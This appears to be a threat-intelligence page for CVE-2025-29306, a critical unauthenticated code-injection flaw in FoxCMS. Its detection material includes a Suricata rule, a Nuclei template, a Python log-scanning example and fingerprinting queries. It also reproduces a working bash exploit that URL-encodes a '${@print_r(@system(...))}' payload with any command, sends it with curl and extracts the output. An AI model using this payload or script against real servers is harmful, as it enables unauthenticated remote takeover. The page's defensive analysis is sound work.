CVE-2025-29306
Published: 2025-03-27
CVE-2025-29306: An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Priority: P1 · 84 · Critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 43.66% (98.6th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| foxcms | foxcms | < 1.2 | 1.2 |

Note: the range above (< 1.2, fixed in 1.2) is inconsistent with the advisory text, which names v.1.2.5 as affected. Do not rely on this range for asset matching; confirm the patched version against the vendor before closing tickets.
Detection & IOCs (extracted from sources)
suricata (ET Open, sid:2062497; the rule uses Suricata 5+ sticky-buffer syntax)
```suricata
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/images/index.html|3f|id|3d 24|"; fast_pattern; content:"|40|print_r"; distance:0; content:"|40|system"; within:20; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-29306.yaml; reference:cve,2025-29306; classtype:attempted-admin; sid:2062497; rev:1; metadata:affected_product FoxCMS, attack_target Web_Server, tls_state plaintext, created_at 2025_05_21, cve CVE_2025_29306, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_05_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
nuclei (request and matcher section of the template)
```yaml
id: CVE-2025-29306
http:
  - method: GET
    path:
      - "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
          - "root:.*:0:0:"
      - type: word
        part: body
        words:
          - "foxcms"
```
- The attack targets the `id` GET parameter of `/images/index.html` with a PHP template injection payload using `@print_r(@system(...))` syntax. Look for URL-encoded `%24%7B%40print_r` or `%40system` in HTTP GET requests to this path; the decoded form is `${@print_r(@system("..."))}`.
- FOFA and Shodan fingerprinting queries can identify exposed FoxCMS instances: search for `body="foxcms-logo"` or `html:"foxcms-logo"`.
- Successful exploitation reflects OS command output in the HTTP response body. Detect responses containing the regex patterns `uid=[0-9]+\(\w+\) gid=[0-9]+\(\w+\)` or `root:.*:0:0:` alongside the word `foxcms`. Caveat: `\w+` does not match a hyphenated account name such as `www-data`, the usual PHP worker account on Debian-based hosts, so the `uid=` pattern misses `uid=33(www-data) gid=33(www-data)`; the `root:.*:0:0:` pattern (output of reading `/etc/passwd`) is the more robust marker.
- The exploit is unauthenticated (no login required). Any GET request to `/images/index.html` whose `id` parameter contains `${` (encoded `%24%7B`) should be treated as suspicious.
- The Suricata/ET rule uses byte-level matching on the normalized (URL-decoded) `http.uri` buffer: the URI must contain `/images/index.html?id=$` (hex: `/images/index.html|3f|id|3d 24|`) followed by `@print_r` (hex: `|40|print_r`) and then `@system` (hex: `|40|system`) within 20 bytes of it. Because the buffer is normalized, the `%24%7B` encoding used by the Nuclei template still matches.
- The exploit script parses command output from a specific XPath location in the HTML response (`/html/body/header/div[1]/div[2]/div[1]/ul`), meaning the injection point reflects output inside the page's navigation/header structure; useful for response-based detection tuning.
- The rule (sid:2062497) is marked `tls_state plaintext`, meaning it will NOT fire on HTTPS/TLS-encrypted traffic. Ensure TLS inspection is in place for full coverage.
- The vulnerability is in the "case display page" component (`index.html`), not a standard PHP endpoint. The injection is processed server-side as a PHP template expression, suggesting a template engine (not direct PHP eval) is involved.
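The request-side and response-side checks described in the notes above, as an added worked example; this is not code from the page, the ET rule or the Nuclei template. It reimplements the same logic in Python so it can be run over access-log lines and captured response bodies: the `id` parameter is URL-decoded (repeatedly, with a bound, so double-encoded payloads surface), the path and `${@print_r(@system(` shape from the ET rule are checked, and the template's two body regexes are applied. The sample request lines and response bodies are constructed for the example; the function names are my own. It also demonstrates the `www-data` caveat from the notes.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PATH = "/images/index.html"

# Payload shape from the Nuclei template / ET rule: id=${@print_r(@system("..."))}
INJECTION_RE = re.compile(r"\$\{@print_r\(@system\(")
# Response markers reproduced verbatim from the Nuclei template.
ID_OUTPUT_RE = re.compile(r"uid=[0-9]+\(\w+\) gid=[0-9]+\(\w+\)")
PASSWD_RE = re.compile(r"root:.*:0:0:")

# Constructed sample request lines ("METHOD target"), not real traffic:
# benign view, the template payload, a double-encoded copy, a bare ${...}
# expression, and the payload sent to a different path.
SAMPLE_REQUESTS = [
    "GET /images/index.html?id=12",
    "GET /images/index.html?id=%24%7B%40print_r%28%40system%28%22id%22%29%29%7D",
    "GET /images/index.html?id=%2524%257B%2540print_r%2528%2540system%2528%2522id%2522%2529%2529%257D",
    "GET /images/index.html?id=%24%7Bfoo%7D",
    "GET /index.php?id=%24%7B%40print_r%28%40system%28%22id%22%29%29%7D",
]

# Constructed response bodies (not captured from a real host); the command
# output sits in the header <ul> the exploit script reads, and the page
# carries the "foxcms" word the template's second matcher requires.
BODY_ROOT = '<ul>uid=0(root) gid=0(root) groups=0(root)</ul><div class="foxcms-logo">'
BODY_WWW = '<ul>uid=33(www-data) gid=33(www-data) groups=33(www-data)</ul><div class="foxcms-logo">'
BODY_PASSWD = '<ul>root:x:0:0:root:/root:/bin/bash\n</ul><div class="foxcms-logo">'


def normalize(value, max_rounds=3):
    """Bounded repeated URL-decoding so double-encoded payloads still surface."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(line):
    """Return 'exploit', 'suspicious' or 'benign' for one 'METHOD target' line."""
    method, _, target = line.partition(" ")
    url = urlsplit(target)
    if method != "GET":
        return "benign"
    values = [normalize(v) for v in parse_qs(url.query, keep_blank_values=True).get("id", [])]
    if any(INJECTION_RE.search(v) for v in values):
        return "exploit"          # payload present, whichever path it was sent to
    if url.path == TARGET_PATH and any("${" in v for v in values):
        return "suspicious"       # template-expression opener on the vulnerable page
    return "benign"


def response_indicates_rce(body):
    """Mirror the template's matchers: command output plus the word 'foxcms'."""
    has_output = bool(ID_OUTPUT_RE.search(body) or PASSWD_RE.search(body))
    return has_output and "foxcms" in body.lower()


def scan(lines=SAMPLE_REQUESTS):
    """Classify every request line; returns {line: verdict}."""
    return {line: classify_request(line) for line in lines}


if __name__ == "__main__":
    for line, verdict in scan().items():
        print(f"{verdict:10s} {line}")
    for name, body in (("root", BODY_ROOT), ("www-data", BODY_WWW), ("passwd", BODY_PASSWD)):
        print(f"response[{name}] -> {response_indicates_rce(body)}")
```

Running it shows the `www-data` body is not flagged by the template's `uid=` regex even though the command clearly executed, while the `/etc/passwd` body is; a detection built on the template's matchers alone will miss hosts whose PHP worker has a hyphenated account name.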
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| VulnCheck | | 9.8 | CRITICAL | |
GHSA
GHSA-8gwj-x84v-j8cc · ghsa_unreviewed · 2025-03-27 · CRITICAL · CWE-94
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
VulnCheck
foxcms foxcms: Improper Control of Generation of Code ('Code Injection') · vulncheck · 2025 · CVSS 9.8 · CRITICAL
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Affected: foxcms foxcms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-29306; https://cyble.com/blog/vulnerabilities-under-attack/; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-17; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-18; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-29306&date=2025-10-19; http
Suricata
ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306) · suricata · 2025-05-21 · CVSS 9.8 · CRITICAL
Rule: sid:2062497, rev:1; reproduced in full under Detection & IOCs above.
Exploit-DB
FoxCMS 1.2.5 - Remote Code Execution (RCE) · exploitdb · 2025-04-19 · CVSS 9.8 · CRITICAL
---
```bash
# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
# Banner body and usage check reconstructed: the listing is truncated here and the
# original banner art is not on the page.
banner() {
cat <<'EOF'
FoxCMS 1.2.5 - Remote Code Execution (CVE-2025-29306)
EOF
}
banner
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <http://target/images/index.html> <command>"
    exit 1
fi
TARGET=$1
# Encode payload: ${@print_r(@system("<cmd>"))}, URL-encoded for the id parameter
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract from known XPath location using xmllint (output is reflected in the header <ul>)
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
# Strip tags, clean up (the listing ends here on the page; this line is added so the script prints the result)
echo "$UL_CONTENT" | sed -e 's/<[^>]*>//g' -e '/^[[:space:]]*$/d'
```
Nuclei
FoxCMS v.1.2.5 - Remote Code Execution · nuclei · CVSS 9.8 · CRITICAL
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
Template (info section; the listing is cut off mid-remediation on the page):
```yaml
id: CVE-2025-29306
info:
  name: FoxCMS v.1.2.5 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
  impact: |
    Unauthenticated attackers can execute arbitrary code through the id parameter in the index.html component, leading to complete server compromise.
  remediation: |
    Update to the latest version of FOXCMS if available. If no patch is available, implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' par
```